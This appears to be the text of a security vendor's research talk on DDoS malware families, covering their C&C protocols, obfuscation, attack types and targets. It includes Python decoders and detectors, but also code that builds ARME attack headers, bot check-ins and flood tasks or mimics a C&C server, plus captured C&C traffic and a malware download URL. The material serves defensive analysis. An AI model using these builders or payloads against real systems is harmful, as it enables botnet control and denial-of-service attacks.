ASERT's DDoS Malware Corral
Volume 2
Agenda
• Who am I
• What is Mcorral
• Quick DDoS Overview
• Malware families
– Life and Death of a DDoS Malware
– "The APT"
– Give 'Em the Boot
– A Business of Ferrets
– The "Hack Forums" Bot
– A Lion, a Snake, and a Goat
– The Accidental APT
• Trends and Takeaways
Who am I
• Dennis Schwarz
– Security Research Analyst on Arbor Networks' ASERT
– Formerly an intrusion analyst with Dell SecureWorks
Mcorral == Malware Corral
• ASERT's malware collection, storage, and processing system
• Second generation
• Developed in-house with dedicated dev-team
– Hi jedwards
• Configured by analysts for analysts
Mcorral – Metaphorically
Mcorral – Visually
Mcorral – Logically
Mcorral – DDoS Malware
DDoS Attacks – Basic
• ICMP flood
• UDP flood
• TCP SYN flood
• TCP Connect flood
• TCP flood
• HTTP HEAD/GET/POST flood
DDoS Attacks – Layer 7
• Slowloris
• ARME (Apache Remote Memory Exhaustion)
a.k.a Apache Killer
– Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,…a lot more…5-1298,5-1299
• RUDY (R-U-Dead-Yet)
• DNS
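The ARME request above is recognisable from a single Range header that carries hundreds of overlapping byte ranges, many of them unsatisfiable (a last byte before the first byte, as in "5-0"). The following Python is an added example and not code from the slides or from any family discussed here: it rebuilds a header of the shape shown on the slide as test input and scores a Range header the way a proxy or WAF rule might. The 200-range threshold mirrors the default of Apache's later MaxRanges directive; the overlap heuristic (ranges sharing the same start byte) is our own simplification.

```python
import re

# one byte-range spec: "first-last", "first-" or "-suffix"
RANGE_SPEC = re.compile(r"^\s*(\d*)\s*-\s*(\d*)\s*$")


def arme_range_header(count=1300):
    """Rebuild the Range header value from the slide: 'bytes=0-,5-0,5-1,...,5-(count-1)'.
    Constructed test input, not a capture."""
    return "bytes=0-," + ",".join("5-%d" % i for i in range(count))


def analyze_range(header_value, max_ranges=200):
    """Inspect a Range header value and decide whether it looks like an ARME request.

    Returns the number of byte-range specs, how many are unsatisfiable (last byte
    before first byte), how many start at a byte an earlier range already started
    at, and a 'flag' verdict.  max_ranges=200 mirrors the default of Apache's later
    MaxRanges directive; ordinary clients send one or two ranges.
    """
    result = {"ranges": 0, "unsatisfiable": 0, "overlapping": 0, "flag": False}
    if not header_value.lower().startswith("bytes="):
        return result                       # not a byte-range set, nothing to check
    starts = []
    for spec in header_value[len("bytes="):].split(","):
        m = RANGE_SPEC.match(spec)
        if not m or (m.group(1) == "" and m.group(2) == ""):
            continue                        # malformed spec, ignore it
        first, last = m.group(1), m.group(2)
        result["ranges"] += 1
        if first and last and int(last) < int(first):
            result["unsatisfiable"] += 1    # e.g. "5-0": invalid per the HTTP range spec
        if first:
            starts.append(int(first))
    # crude overlap measure: ranges whose start byte was already used as a start
    result["overlapping"] = len(starts) - len(set(starts))
    result["flag"] = (result["ranges"] > max_ranges
                      or result["unsatisfiable"] > 0
                      or result["overlapping"] > 0)
    return result
```

A benign download manager request such as "bytes=500-999,1000-" passes; the slide's header is flagged on all three counts, and even a short "bytes=0-,5-0" is caught by the unsatisfiable-range check, so the rule does not depend on the attacker sending a long header.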
DDoS Attacks – Reflection/Amplification
• Chargen
• DNS
• NTP
• SNMP
DDoS Attacks – Booters
Why these malware families?
• DDoS related
• Automated heuristics
• Less well known
• Smaller
• Active campaigns
• Pet malware
Life and Death of a DDoS Malware
Trojan.BlackRev
Born
• March 2013
Russian
Delphi
Namesake
Panel
Marketing
Pricing
• Admin panel and bot build: 300-450 WMZ
• Bot builder: 650-1000 WMZ
Author
Author – Attribution
C&C – Phone Home
C&C – Command Polling
Attack Types
• http – HTTP GET request flood
• simple – HTTP GET request flood
• loginpost – HTTP POST request flood
• datapost – HTTP POST request flood
• syn – TCP connection flood
• udp – UDP flood
• udpdata – UDP flood
• data – TCP flood
• icmp – ICMP echo request flood
• tcpdata – TCP flood
• dataget – HTTP GET request flood
• connect – TCP flood
• antiddos – HTTP GET request flood – favicon.ico
• range – HTTP GET request flood – Range header
• ftp – FTP connection flood
• download – HTTP GET request flood
• fastddos – HTTP GET request flood – WinInet functions
• slowhttp – HTTP GET request flood – possible Slowloris attempt
• allhttp – multi HTTP floods
• full – multi floods
C&C – Locations
Attack Type Distribution
• http – 64.06%
• udp – 23.44%
• syn – 11.06%
• loginpost – 1.17%
• datapost – 0.11%
• data – 0.08%
• postlogin – 0.07%
Targeted Countries
• RU – 39.81%
• GB – 17.83%
• UA – 11.77%
• DE – 10.32%
• CR – 9.87%
• BZ – 4.16%
• SE – 2.60%
• MY – 1.70%
• US – 1.48%
• PA – 0.43%
• SG – 0.04%
Targets
Died
• June 5, 2013
Estate Sale
• October 4, 2013
Code Snippet
“The APT”
Trojan.UUTab
First Seen
• May 1, 2013
Chinese
C++
Namesake
C&C – Obfuscation
def decrypt(msg):
    # XOR key is stored in a 126-element array of words;
    # the binary assigns each element manually.
    key = [
        3,2,5,8,5,1,2,3,2,5,3,4,1,2,4,3,5,8,2,4,5,8,1,2,4,3,1,1,8,1,2,4,3,1,1,5,2,2,1,2,1,3,5,2,2,1,2,1,
        3,3,1,2,3,5,2,6,2,4,1,3,2,1,2,6,2,3,3,2,1,1,3,6,2,1,2,4,4,3,1,2,3,5,2,6,3,1,2,3,5,2,6,5,2,2,1,2,
        1,2,6,2,3,3,2,1,1,5,2,2,1,2,1,2,3,2,5,3,4,1,2,2,3,1,2,3,5,2,
    ]
    assert len(key) == 126
    # msg is the raw C&C payload (bytes); the key repeats every 126 bytes
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(msg))
C&C – Obfuscation
C&C – Phone Home
• binstruct
• 516 or 1028 bytes
struct {
    char magic[4] = "UUt";
    char os_version[64];
    int cpu_speed;
    char padding1[32];
    int max_network_interface_speed;
    char padding2[408];
}
C&C – Phone Home
C&C – Response (516-byte)
struct {
    int command;
    struct params params;
    char padding[76];
}
struct params {
    char target_host[400];
    short target_port;
    short padding;
    int flood_time_in_secs;
    int delay_in_ms;
    int number_of_threads;
    int sub_command;
    int field_1A4;
    int rand_source_ip_bool;
    int payload_size;
    int field_1B0;
}
C&C – Response (1028-byte)
struct {
    int command = 0x77;
    struct params params;
    char padding[324];
}
struct params {
    char query_name[100];
    int flood_time_in_secs;
    int delay_in_ms;
    int number_of_threads;
    int source_ip[32];    // note: the fields only sum to 1028 bytes if this is a 32-byte field, not 32 ints
    int set_query_name;
    int set_rand_ip;
    int set_source_ip;
    int num_dns_servers;
    char dns_server_0[30];
    ...
    char dns_server_17[30];
}
Attack Types
• 0x88, 0x1 – TCP SYN flood
• 0x88, 0x2 – “big” TCP SYN flood
• 0x88, 0x3 – “big” TCP SYN flood (duplicate)
• 0x88, 0x4 – UDP flood
• 0x88, 0x5 – ICMP echo request flood
• 0x77 – DNS server flood or DNS amplification attack
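The two binstruct layouts above are enough to serialise and parse the protocol. The following Python is an added example, not code from the slides or from UUTab itself: it packs and unpacks the 516-byte check-in and task with struct, using the field order and sizes listed above, and maps (command, sub_command) to the attack names from the slide. It assumes little-endian 32-bit integers with no alignment padding (the only layout in which the sizes sum to 516) and works on the plain structures; whether the 126-byte XOR key shown earlier is applied on the wire first is not stated on these slides, so that step is left out. The 1028-byte DNS task (command 0x77) is not handled.

```python
import struct

MAGIC = b"UUt\x00"              # char magic[4] = "UUt" is 'U','U','t',NUL in C

# 516-byte check-in: magic, os_version[64], cpu_speed, padding1[32],
# max_network_interface_speed, padding2[408]  (little-endian, no alignment padding)
CHECKIN_FMT = "<4s64si32si408s"

# 516-byte task: command, params (target_host[400], port, pad, eight ints), padding[76]
TASK_FMT = "<i400sHhiiiiiiii76s"

# (command, sub_command) pairs from the slide
ATTACK_NAMES = {
    (0x88, 0x1): "TCP SYN flood",
    (0x88, 0x2): "big TCP SYN flood",
    (0x88, 0x3): "big TCP SYN flood (duplicate)",
    (0x88, 0x4): "UDP flood",
    (0x88, 0x5): "ICMP echo request flood",
}

assert struct.calcsize(CHECKIN_FMT) == 516 and struct.calcsize(TASK_FMT) == 516


def build_checkin(os_version, cpu_speed, nic_speed):
    """Bot side: serialise the check-in with the layout from the slide."""
    return struct.pack(CHECKIN_FMT, MAGIC, os_version.encode()[:64],
                       cpu_speed, b"", nic_speed, b"")


def parse_checkin(buf):
    """C&C / analyst side: unpack a check-in, rejecting wrong sizes and magics."""
    if len(buf) != 516:
        raise ValueError("check-in must be 516 bytes, got %d" % len(buf))
    magic, os_version, cpu_speed, _pad1, nic_speed, _pad2 = struct.unpack(CHECKIN_FMT, buf)
    if magic != MAGIC:
        raise ValueError("bad magic %r" % magic)
    return {"os_version": os_version.rstrip(b"\0").decode("latin-1"),
            "cpu_speed": cpu_speed, "nic_speed": nic_speed}


def build_task(command, sub_command, host, port, seconds, delay_ms, threads,
               rand_source_ip=0, payload_size=0):
    """C&C side: serialise a 516-byte task; field_1A4 and field_1B0 are left zero."""
    return struct.pack(TASK_FMT, command, host.encode()[:400], port, 0,
                       seconds, delay_ms, threads, sub_command, 0,
                       rand_source_ip, payload_size, 0, b"")


def parse_task(buf):
    """Decode a 516-byte task and name the flood it requests.
    The 1028-byte DNS variant (command 0x77) has a different params layout
    and is not handled here."""
    if len(buf) != 516:
        raise ValueError("expected a 516-byte task, got %d bytes" % len(buf))
    (command, host, port, _pad, seconds, delay_ms, threads, sub_command,
     _field_1a4, rand_source_ip, payload_size, _field_1b0, _padding) = struct.unpack(TASK_FMT, buf)
    return {
        "command": command,
        "sub_command": sub_command,
        "attack": ATTACK_NAMES.get((command, sub_command), "unknown"),
        "target": host.rstrip(b"\0").decode("latin-1"),
        "port": port,
        "seconds": seconds,
        "delay_ms": delay_ms,
        "threads": threads,
        "rand_source_ip": bool(rand_source_ip),
        "payload_size": payload_size,
    }
```

The explicit "<" in the format strings matters: with native alignment the layout could pick up padding and the calcsize assertion would fail, which is exactly the check to run before trusting a struct layout recovered from a disassembly.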
C&C -- Locations
Last Seen
• February 11, 2014
Give 'Em the Boot
Trojan.AyaBot
Namesake
• Aya == AreYouAreDo
First Seen
• May 23, 2013
Russian
Delphi
Marketing / Pricing
C&C – Redirect
C&C – Obfuscation
>>> from base64 import b64decode
>>> b64decode(b64decode(b64decode("WVVoU01HTkViM1pNTWtvMVlrYzVjVmxZU25KaU1qVm9Xa2hhZG1OdFZYVmpibFYyV1RKNGFHTXpUbXhqZVRsNlRHNUNiMk5CUFQwPQ==")))
'http://bylojarkonadvore.ru/classes/s.php'
C&C – Ping
C&C – Obfuscation
Query
>>> b64decode(b64decode(b64decode("WTBkc2RWcDNQVDA9")))
'ping'
Response
>>> b64decode(b64decode(b64decode("VFRKTk5VMXRVVFZaVjFacFRVUmpNRnB0V1hwT2FtUnJUbTFOTUZwdFZURk9ha1pxV1cxYWFGcFVWVDA9")))
'3c92d9aeb074ff367d6c4fe561cbfae5'
C&C – Registration
C&C – Obfuscation
Query
>>> b64decode(b64decode(b64decode("WTIxV2JtRllUakJhV0VvNFVWaHNhRkZ0T1RCbVJVWkZWRlZzVDB4VlVrWlBWVTVEVDBSb1ExRnVlRXBpYmxKc1lrTlZlVTlHU1d4TmFtdHlWMGRXZG1KcFZYbFBSa2xzVFdwcmNsRXhRbFpMZVhOeVMzbHpja3Q1YzNKTGVYUkdUbFJaTUU1VGMzSktWRkYzUzNwSmRVNUVRa2hUU0c5eVRGTnplVTE2WnpWTE1ERkpaV2x6Y2t0Nll6Sk9NREZEUzNsemNrMUhVWEpOUjJkeVRWY3djazFVVW5wTGVYTnlWakpzZFZkR1FYSkxlWFJXVlRCRlBRPT0=")))
'register|AyaBot|ADMIN-DE9CB88BB|Intel%28R%29+Xeon%28R%29+CPU+++++++++++E5645++%40+2.40GHz+-+2389+MHz+++767MB+++0d+0h+1m+14s+++WinXP+++USA'
Response
>>> b64decode(b64decode(b64decode("V1RJNWRWcHRiRzVtUjJ4clprUlJlRTFFWnpRPQ==")))
'config|id|41088'
C&C – Command Polling
C&C – Obfuscation
Query
>>> b64decode(b64decode(b64decode("V2pKV01HUkhSbnBoTTNjd1RWUkJORTlJZUVKbFYwWkRZak5TT0UxcE5IaE9XSGhwV1cxUmVFNXFWWGRPZWtwcVdtYzlQUT09")))
'gettask|41088|AyaBot|2.15|bbd165072cf'
Response
>>> b64decode(b64decode(b64decode("WkRKR2NHUkJQVDA9")))
'wait'
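The AyaBot dialogue above is plain text, fields separated by '|', wrapped in three rounds of base64. The following Python is an added example, not the bot's or the panel's code: wrap() and unwrap() implement the encoding, the bot-side helpers build the register and gettask messages in the captured form, C2Stub is a stand-in for s.php that hands out ids and answers polls, and decode_capture() turns captured blobs into a readable transcript. It models only the verbs visible in the capture; the slides show no task format, so every poll is answered with 'wait', and the ping response (a 32-character hex digest of unknown origin) is not modelled. The constructed register message reuses the hostname and CPU string from the capture.

```python
from base64 import b64decode, b64encode
from urllib.parse import quote_plus, unquote_plus


def wrap(text):
    """Encode one AyaBot message: three rounds of base64 over the ASCII text."""
    data = text.encode("ascii")
    for _ in range(3):
        data = b64encode(data)
    return data.decode("ascii")


def unwrap(blob):
    """Reverse wrap(); raises on anything that is not valid triple base64."""
    data = blob.encode("ascii")
    for _ in range(3):
        data = b64decode(data, validate=True)
    return data.decode("ascii")


def bot_register(hostname, cpu, mem_mb, uptime, os_name, country):
    """Bot side: 'register|AyaBot|<hostname>|<form-encoded system info>' as in the capture."""
    sysinfo = quote_plus("%s   %dMB   %s   %s   %s" % (cpu, mem_mb, uptime, os_name, country))
    return wrap("register|AyaBot|%s|%s" % (hostname, sysinfo))


def bot_gettask(bot_id, version, build):
    """Bot side: 'gettask|<id>|AyaBot|<version>|<build>'."""
    return wrap("gettask|%d|AyaBot|%s|%s" % (bot_id, version, build))


class C2Stub:
    """Stand-in for the panel's s.php: assigns ids on register and answers polls.
    Only the verbs visible in the capture are modelled; no task format is shown on
    the slides, so a poll is always answered with 'wait'."""

    def __init__(self, first_id=41088):
        self.next_id = first_id
        self.bots = {}

    def handle(self, blob):
        verb, *args = unwrap(blob).split("|")
        if verb == "register" and len(args) == 3 and args[0] == "AyaBot":
            bot_id, self.next_id = self.next_id, self.next_id + 1
            self.bots[bot_id] = {"host": args[1], "sysinfo": unquote_plus(args[2])}
            return wrap("config|id|%d" % bot_id)
        if verb == "gettask" and args and args[0].isdigit() and int(args[0]) in self.bots:
            return wrap("wait")
        raise ValueError("unexpected message: %r" % verb)


def decode_capture(messages):
    """Turn captured (direction, blob) pairs into readable (direction, verb, args) tuples."""
    out = []
    for direction, blob in messages:
        verb, *args = unwrap(blob).split("|")
        out.append((direction, verb, args))
    return out
```

Because the wrapping is deterministic, wrap("ping") reproduces the captured query byte for byte, which is also a cheap way to confirm that a sample really is speaking this protocol before writing a signature for it.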
Attack Types
• udp – UDP flood
• tcp – TCP flood
• syn – TCP connect flood
• icmp – ICMP request flood
• ie – HTTP GET/POST request flood via browser
• http – HTTP GET/POST request flood
C&C – Locations
Attack Type Distribution
• http – 74%
• syn – 26%
Targeted Countries
• RU – 41%
• RO – 18%
• US – 15%
• UA – 11%
• GB – 7%
• DE – 2%
• FR – 2%
• BE – 2%
• Unknown – 2%
Targets
Impromptu Interview
• http://areyouaredo.cc/c/identification.php
Interview – Snippets
• On distribution of malware/exploit kits
– 20:17:21 AreYouAreDo: exploits are very expensive
• On advertising of booter service
– 20:19:45 AreYouAreDo: google
• On how he got started in DDoS
– 20:28:47 AreYouAreDo: well, image poor guy or people in so poor, corrupted country like russia or ukraine. annoying bad job, money is tight. and a lot of ambition)
• On how much money he makes
– 20:31:52 AreYouAreDo: how much money? hmm much much better than regular job
• On hacking sites
– 20:41:55 AreYouAreDo: xss. sql.
Interview – Snippets
• On his customers and their attacks
– 20:34:41 AreYouAreDo: sometimes there is some job from police =)
– 20:37:44 AreYouAreDo: web-shops, political, games etc.
• On handling money
– 20:40:01 AreYouAreDo: well , ill say not clear true, but enough to understand. online game currencyies
– 20:40:53 AreYouAreDo: bitcoin is not popular for russian customers
• On anti-DDoS companies
– 20:53:01 AreYouAreDo: that might be interesting from [for] you that mant [many] anti-ddos companies was or still selling ddos services =)
Last Seen
• February 20, 2014
A Business of Ferrets
Trojan.Ferret
First Seen
• November 30, 2013
Russian
Delphi
Panel – Logon
Angry Cat Aside
Panel – Statistics
Panel – Bot List
Versions
• 2.11
• 2.12
• 2.22
• 2.24
Distribution
• Andromeda
– February 2014
– http://www.discoverylaos.com/images/5ise.exe
• Trojan.Ferret
• 2ca7dd095a266867fd72d3d6db5bbce5
C&C – Obfuscation
• Key: 8
import base64

def decrypt_cnc(msg, key):
    # msg: one base64-encoded C&C field; key: the XOR key as bytes (e.g. b"8"),
    # repeated over the whole payload
    msg_no_b64 = base64.b64decode(msg)
    plain_buf = bytearray()
    for offset, enc_byte in enumerate(msg_no_b64):
        plain_buf.append(enc_byte ^ key[offset % len(key)])
    return plain_buf.decode("latin-1")
Strings – Obfuscation
• 12xc3qwfhjeryTTYHH
• mu#X
import base64

def decrypt_strings(msg, key):
    # msg: base64-encoded obfuscated string; key: key bytes (e.g. b"12xc3qwfhjeryTTYHH").
    # Only the low nibble of each byte is transformed (XOR with the key byte's low
    # nibble, then XOR with 0xA); the high nibble passes through unchanged.
    msg_no_b64 = base64.b64decode(msg)
    plain_buf = bytearray()
    for i, enc_byte in enumerate(msg_no_b64):
        key_lsb = key[i % len(key)] & 0xf
        msg_lsb = enc_byte & 0xf
        c = msg_lsb ^ key_lsb
        d = c ^ 0xa
        msg_slsb = enc_byte & 0xf0
        plain_buf.append(msg_slsb ^ d)
    return plain_buf.decode("latin-1")
C&C – Encryption Keys
• GMrlZ8t3pypO3423423LpFqCUx
• r7EmA83vkqMzPdjFD6poMMJunbpcKHsi
• tEhcC382fJxOQxT4v0bJWnttu4UdFO7S
• SnEvAjtZP2YUHbHdhYETII2FNS0RM4hK
• 6mEx2OU8mrLtS51yGSnExzKW7RQI1TL6
• HPWwCNtLoDt7rkOz1nxH7tIV7NRVnYpj
• FQNZ9Ioax3PyVefugdbm2cU5wWuqMvxH
• 0BWoYwkosH5jn1eD2kQjWu4LjPlSrtDQ
C&C – Phone Home
POST /hor/input.php HTTP/1.0
Host: 188.190.101.13
User-Agent: Mozilla Gecko Firefox 25
Accept: text/plain
Accept-Encoding: identity
Accept-Language: en-EN,en
Connection: Close
Referer: http://mhome.br
Content-Length: 106
Content-Type: application/x-www-form-urlencoded
m=CA==&h=CQAACAsPDgEICgkPCQkPDQgPDw4KCQ4LDw4BCwE=&p=cHd1fQ==&v=ChYJCRhta3k=&s=DRhAAA4YeRgIXBgIUBgPVRgKAEs=
m=0&h=18803769021711750776216376939&p=HOME&v=2.11 USA&s=5 x86 A 0d 0h 7m 28s
C&C – Fake Phone Home
POST /SpC/wowcab.php HTTP/1.0
Host: anyve.org
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_1; pl-PL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36
Accept: text/plain
Accept-Encoding: identity
Accept-Language: en-EN,en
Connection: Close
Referer: http://moneydo.nl
Content-Length: 110
Content-Type: application/x-www-form-urlencoded
m=CA==&h=CQAJAA4IDAgACwkPDQ8ACggOCQsJCwwJCw0JDQgI&p=cndwdhVoexhjdnlsZRgIXAhQCQpV&v=ChYKDBhta3k=&s=D0AADhhtGA==
C&C – Phone Home Response
HTTP/1.1 200 OK
Date: Wed, 04 Dec 2013 14:48:27 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 32
Connection: close
Content-Type: text/html; charset=UTF-8
dVdCUVRUWRh/XVtTVxh+UUpdXldAGAoN
Mozilla Gecko Firefox 25
C&C – User Agents
• Mozilla Gecko Firefox 25
• Mozilla compatible (Apple webKit 6)
• Mozilla Gecko 5.0 Firefox
• Mozilla Gecko 1.664
• Mozilla Gecko 123
• Mozilla Gecko 4.0 compatible
• Mozilla Gecko 112
• Mozilla Gecko
C&C – Command Polling
POST /hor/input.php HTTP/1.0
Host: 188.190.101.13
User-Agent: Mozilla Gecko Firefox 25
Accept: text/plain
Accept-Encoding: identity
Accept-Language: en-EN,en
Connection: Close
Referer: http://udot.tk
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
m=CQ==&h=CQAACAsPDgEICgkPCQkPDQgPDw4KCQ4LDw4BCwE=
m=1&h=18803769021711750776216376939
C&C – Command Polling Response
HTTP/1.1 200 OK
Date: Wed, 04 Dec 2013 12:56:16 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 72
Connection: close
Content-Type: text/html; charset=UTF-8
UExMSF5UV1dcElBMTEgCFxdMWUpfXUwWVl1MF1FWXF1AFkhQSBcSAAgSCQ0IEgg=
httpflood*http://target.net/index.php/*80*150*0
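The captured phone-home and polling traffic above decode with the one-byte key "8" listed under C&C – Obfuscation. The following Python is an added example, not Ferret's or ASERT's code: it decodes every field of the captured POST body and the two responses, recovers the single-byte key by brute force from what the decoded fields must look like (h is a decimal bot id, v starts with a dotted version number), and splits the task string into its fields. The test input is the traffic from the slides; the meaning of the trailing task fields ("150", "0") is not stated on the slides, so they are left unnamed.

```python
import base64
import re


def xor_b64_decode(blob, key):
    """One Ferret C&C field: base64, then XOR with the repeating key (the slide's decrypt_cnc scheme)."""
    raw = base64.b64decode(blob)
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(raw)).decode("latin-1")


def decode_form(body, key):
    """Decode every field of a Ferret POST body.  Values are split on '&' and '='
    without URL-unquoting, because '+' and '=' are part of the base64 alphabet."""
    fields = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        fields[name] = xor_b64_decode(value, key)
    return fields


def recover_single_byte_key(body):
    """Brute-force a one-byte XOR key against a captured phone-home using what the
    decoded fields must look like: h is a long decimal bot id and v starts with a
    dotted version number.  Returns the list of keys satisfying both constraints."""
    raw = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        raw[name] = base64.b64decode(value)
    if "h" not in raw or "v" not in raw:
        return []
    candidates = []
    for k in range(256):
        h = bytes(b ^ k for b in raw["h"]).decode("latin-1")
        v = bytes(b ^ k for b in raw["v"]).decode("latin-1")
        if h and all(ch in "0123456789" for ch in h) and re.match(r"\d+\.\d+", v):
            candidates.append(bytes([k]))
    return candidates


ATTACKS = {
    "httpflood": "HTTP GET flood",
    "httppost": "HTTP POST flood",
    "udpflood": "UDP flood",
    "synflood": "TCP connect flood",
    "tcpflood": "TCP flood",
}


def decode_task(blob, key):
    """Decode a command-polling response: '*'-separated attack name, target and port,
    followed by numeric fields the slides do not name (kept as 'extra')."""
    text = xor_b64_decode(blob, key)
    parts = text.split("*")
    if len(parts) < 3 or parts[0] not in ATTACKS:
        return {"raw": text, "attack": None}
    return {"raw": text, "attack": parts[0], "description": ATTACKS[parts[0]],
            "target": parts[1], "port": int(parts[2]) if parts[2].isdigit() else None,
            "extra": parts[3:]}


# the phone-home body, its response and the task response from the slides, as test input
PHONE_HOME_BODY = ("m=CA==&h=CQAACAsPDgEICgkPCQkPDQgPDw4KCQ4LDw4BCwE=&p=cHd1fQ=="
                   "&v=ChYJCRhta3k=&s=DRhAAA4YeRgIXBgIUBgPVRgKAEs=")
PHONE_HOME_RESPONSE = "dVdCUVRUWRh/XVtTVxh+UUpdXldAGAoN"
TASK_RESPONSE = "UExMSF5UV1dcElBMTEgCFxdMWUpfXUwWVl1MF1FWXF1AFkhQSBcSAAgSCQ0IEgg="
```

The key recovery is what makes this useful beyond the one sample: for a new Ferret capture with an unknown one-byte key, the digit-only constraint on h alone leaves two candidates ("8" and "9"), and the version-number constraint on v settles it. The phone-home response decodes to the User-Agent the bot is told to use from then on.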
Attack Types
• httpflood – HTTP GET flood
• httppost – HTTP POST flood
• udpflood – UDP flood
• synflood – TCP connect flood
• tcpflood – TCP flood
C&C – Locations
Attack Type Distribution
• httpflood – 95%
• udpflood – 4%
• tcpflood – 1%
Targeted Countries
• DE – 36%
• Unknown – 31%
• RU – 22%
• FR – 3%
• US – 3%
• NL – 3%
• UA – 1%
• KZ – 1%
• GB – 0%
• EE – 0%
Targets
Last Seen
• February 14, 2014
The “Hack Forums” Bot
Trojan.UGSec
First Seen
• July 2, 2013
US
C++
Marketing
Marketing
Pricing
• 30-50$
• Paypal and Bitcoin
Author
Author – Poor OPSEC
1. Posted Steam username on Hack Forums thread
2. Steam profile linked to gaming site
3. Gaming site linked to Etsy shop
4. Etsy links to real name, location, age, pictures, twitter, etc.
C&C
• IRC
• Nickname: UGSec[US|W7|x86|1c]rmryazr24v
– Country code (provided by http://freegeoip.net/xml/)
– Windows version
– Architecture
– Number of processors
– 10 random lowercase alphanumeric characters
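The nickname layout above is a usable detection hook for IRC traffic. The following Python is an added example, not from the slides or from the bot: a regex for the UGSec nick layout and a scanner that pulls nicknames out of raw IRC lines, both from client NICK commands and from the ":nick!user@host" prefix of server-relayed messages. The sample IRC lines are constructed for the example (the first nick is the one from the slide; the second bot and the human user are made up), and the processor-count field is kept as a string because the slide does not say how "1c" is encoded.

```python
import re

# UGSec[<country>|<windows version>|<arch>|<cpus>]<10 random lowercase alphanumerics>
NICK_RE = re.compile(
    r"^UGSec\[(?P<country>[A-Z]{2})\|(?P<winver>[^|\]]+)\|(?P<arch>[^|\]]+)\|(?P<cpus>[^|\]]+)\]"
    r"(?P<rand>[a-z0-9]{10})$"
)


def parse_ugsec_nick(nick):
    """Return the fields of a UGSec-style nick, or None if the nick does not match."""
    m = NICK_RE.match(nick)
    return m.groupdict() if m else None


def nick_from_irc_line(line):
    """Pull the nickname out of a raw IRC line: a client 'NICK <nick>' command or the
    ':<nick>!<user>@<host>' prefix of a server-relayed message."""
    line = line.rstrip("\r\n")
    if line.upper().startswith("NICK "):
        return line[5:].strip().lstrip(":")
    if line.startswith(":"):
        prefix = line[1:].split(" ", 1)[0]
        return prefix.split("!", 1)[0]
    return None


def find_ugsec_bots(irc_lines):
    """Scan raw IRC lines and return one dict per UGSec-style nick seen."""
    hits = []
    for line in irc_lines:
        nick = nick_from_irc_line(line)
        fields = parse_ugsec_nick(nick) if nick else None
        if fields:
            hits.append(dict(fields, nick=nick))
    return hits


# constructed sample traffic: the nick from the slide, a second bot and a human user
SAMPLE_IRC = [
    "NICK UGSec[US|W7|x86|1c]rmryazr24v\r\n",
    "USER rmryazr24v 0 * :rmryazr24v\r\n",
    ":UGSec[US|W7|x86|1c]rmryazr24v!rmryazr24v@192.0.2.15 JOIN :#ugsec\r\n",
    ":UGSec[DE|XP|x86|2c]k3h9qz0vbn!k3h9qz0vbn@198.51.100.7 JOIN :#ugsec\r\n",
    ":alice!alice@203.0.113.9 PRIVMSG #ugsec :hi\r\n",
]
```

Anchoring the regex at both ends and fixing the random suffix at exactly ten characters keeps the rule from matching look-alike nicks chosen by people; the same pattern can be dropped into an IDS content match on the NICK command for the wire-level equivalent.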
Attack Types
• !ddos.layer4.chargen.udp – UDP flood
• !ddos.layer4.chargen.tcp – TCP flood
• !ddos.layer7.samp – Grand Theft Auto San Andreas Multiplayer query flood
Attack Types – !ddos.layer7.samp
• Grand Theft Auto San Andreas Multiplayer query flood
• http://wiki.sa-mp.com/wiki/Query_Mechanism
Last Seen
• August 8, 2013
A Lion, a Snake, and a Goat
Trojan.Chimera
First Seen
• July 12, 2013
Bulgarian
Panel – Login
C++
Namesake
• d:\developement\projects\chimera\Release\chimera.pdb
Source Code
C&C – Redirect
C&C – Command Polling
C&C – Response
Attack Types
• GET – HTTP GET flood
• POST – HTTP POST flood
• SLOW – Slowloris
• TCP – TCP flood
C&C – Locations
Attack Type Distribution
• SLOW – 100%
Targeted Countries
• US – 100%
Targets
Last Seen
• February 18, 2014
The Accidental APT (an aside)
Trojan.Zuguo
strings
$ strings AML-11464843.rsrc-47189006.dynamic.dropped | grep -i ddos
SIMPLE_DDOS
Reverse Engineering Results
• No DDoS capabilities
• Chinese RAT
– Dubbing Trojan.Zuguo
• C&C communications crypto key
Namesake and Stage 1 C&C
C&C – Stage 2
• C&C communications encrypted with Blowfish and LZO compression
• Phone home fields
– Most fields are self explanatory
ADMIN-PC/SYSTEM|Windows 7x32 Service Pack 1.0 (Build 7601)|1 * 59733MHz|Total:767MB,Avail:448MB|0d 0h 1m 32s| 10.74.21.100|a.b.c.d|341 ms|0||new|123|1.0|0|0|0|0|
Registry – Configuration
Attribution – Trojan.DrAgOn
• Shares the solo C&C IP with Trojan.DrAgOn
Trojan.DrAgOn C&C – Obfuscation
import sys
import struct
import zlib

# usage: DrAgOn_decrypt.py <raw C&C data file> [offset]
# Each message is a 6-byte tag "DrAgOn", a uint32 packed_size, a uint32
# unpacked_size and zlib-compressed data. packed_size counts the 14-byte header
# too: the second message in the capture below starts at offset 37.
with open(sys.argv[1], "rb") as fp:
    data = fp.read()
offset = 0
if len(sys.argv) == 3:
    offset = int(sys.argv[2])
data = data[offset:]
print("tag: %s" % data[0:6].decode("latin-1"))
packed_size = struct.unpack("<I", data[6:10])[0]
print("packed_size: %d" % packed_size)
unpacked_size = struct.unpack("<I", data[10:14])[0]
print("unpacked_size: %d" % unpacked_size)
print("data: %s" % zlib.decompress(data[14:packed_size]).decode("latin-1", "replace"))
Trojan.DrAgOn C&C – Obfuscation
$ python DrAgOn_decrypt.py pcap1_outbound_data
tag: DrAgOn
packed_size: 37
unpacked_size: 21
data: ?20080808181818ABCDEF
$ python DrAgOn_decrypt.py pcap1_outbound_data 37
tag: DrAgOn
packed_size: 319
unpacked_size: 2281
data: ?yr?ky??v000802A2E23DFI?antimodernistme(
Service Pack 2Intel(R) Pentium(R) III CPU - S 1133MHz
?eCompaq NC3163 Fast Ethernet NIC - Packet Scheduler
Minipor??=?+???Compaq NC3163 Fast Ethernet NIC #2 - Packet
Scheduler Minipor??&?+?
